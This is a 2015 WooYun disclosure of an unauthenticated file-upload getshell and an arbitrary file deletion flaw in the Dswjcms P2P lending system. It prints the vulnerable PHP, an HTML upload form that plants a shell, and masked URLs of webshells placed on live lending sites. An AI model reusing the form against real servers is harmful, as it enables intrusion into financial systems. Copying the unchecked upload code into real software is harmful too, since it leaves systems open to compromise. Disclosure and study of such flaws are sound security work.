当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2015-141209

漏洞标题: 某P2P网贷系统前台getshell与任意文件删除漏洞(可涉及大量资金安全)

相关厂商: dswjcms.com

漏洞作者: roker

提交时间: 2015-09-17 12:33

修复时间: 2015-12-16 19:54

公开时间: 2015-12-16 19:54

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

3人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-11-11: 细节向核心白帽子及相关领域专家公开
2015-11-21: 细节向普通白帽子公开
2015-12-01: 细节向实习白帽子公开
2015-12-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

Boom~

详细说明:

/www/Public/uploadify/uploadify.php

code 区域
<?php


/*


uploadify 后台处理


*/





//设置上传目录


error_reporting( E_ALL & ~E_NOTICE & ~E_DEPRECATED );


$path = "uploads/".$_GET['folder']."/";	


if($_GET['file_delete']){	//如果原先有图片就删除	


	if(file_exists('.'.$_GET['file_delete'])){	//存在图片


		unlink('.'.$_GET['file_delete']);	//删除它


	}


}


if (!empty($_FILES)) {


	


	//得到上传的临时文件流


	$tempFile = $_FILES['Filedata']['tmp_name'];


	


	//允许的文件后缀


	$fileTypes = array('jpg','jpeg','gif','png'); 


	


	//得到文件原名


	$fileParts = pathinfo($_FILES['Filedata']['name']);


	$ftype=$fileParts['extension'];


	$fileName=microtime(true).".".$fileParts['extension'];	//以微秒时间命名


	


	//最后保存服务器地址


	if(!is_dir($path))


	   mkdir($path);


	if (move_uploaded_file($tempFile, $path.$fileName)){


		echo $fileName;


	}else{


		echo $fileName.$_FILES['Filedata']['tmp_name']."上传失败!";


	}


}


?>



没有权限设置 ,$fileTypes也没有看到调用。

提交$_GET['file_delete'] 即可任意文件删除。



本地构造表单

code 区域
<form action="http://xxx/Public/uploadify/uploadify.php" method="post" enctype ="multipart/form-data" > 


<input id="File" name="Filedata" type="file" /> 


<input type="submit" name="Button1" value="Button" id="Button1" />


</form>



即可getshell。

漏洞证明:

案例 1:

http://**.**.**.**/

11.png



13亿。。不知道真的假的。。拒绝查水表- -

http://**.**.**.**/Public/uploadify/uploads/201509/1442254529.7142.php

案例2:

http://**.**.**.**/

33.png



几百万。

http://**.**.**.**//Public/uploadify/uploads/1442254710.5383.php

案例3:

http://**.**.**.**/

22.png



10多万。

http://**.**.**.**//Public/uploadify/uploads/1442254745.36.php

4:

http://**.**.**.**//Public/uploadify/uploads/1442254784.43.php

5:

http://**.**.**.**/Public/uploadify/uploads/1442254831.3598.php

修复方案:

判断权限。检测后缀

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-09-17 19:52

厂商回复:

感谢您对Dswjcms的支持,以上几个站点都未购买过本公司的授权,请自行通知对应公司

最新状态:

2015-09-17:漏洞已修复 感谢楼主对本开源系统的漏洞挖掘,我们在收到楼主的第一时间内已对反应的漏洞进行了修复,漏洞已通过Dswjcms官方论坛给予修复意见,并在下一版本对该漏洞进行修复;已购买授权的用户,我们将以邮件形式通知其自行修复,未购买授权的用户,请看到后去官方论坛查看修复方式后自行修复 最后感谢乌云和作者为Dswjcms开源项目付出的贡献

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-09-17 20:07 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    0

    @Dswjcms 有病哦 都撸穿了 给1rank 还不如忽略呢。

    1# 回复此人
  2. 2015-09-17 20:16 | roker ( 普通白帽子 | Rank:372 漏洞数:109 )
    0

    心累。

    2# 回复此人
  3. 2015-09-17 21:14 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    1分啊。。。。侮辱。。

    3# 回复此人
  4. 2016-01-11 08:49 | Dswjcms(乌云厂商)
    0

    不好意思,第一次接触乌云,所以一知道规则,还请见谅

    4# 回复此人
  5. 2016-01-11 15:47 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)
    0

    第一次接触乌云........ 这理由好。

    5# 回复此人

登录后才能发表评论,请先 登录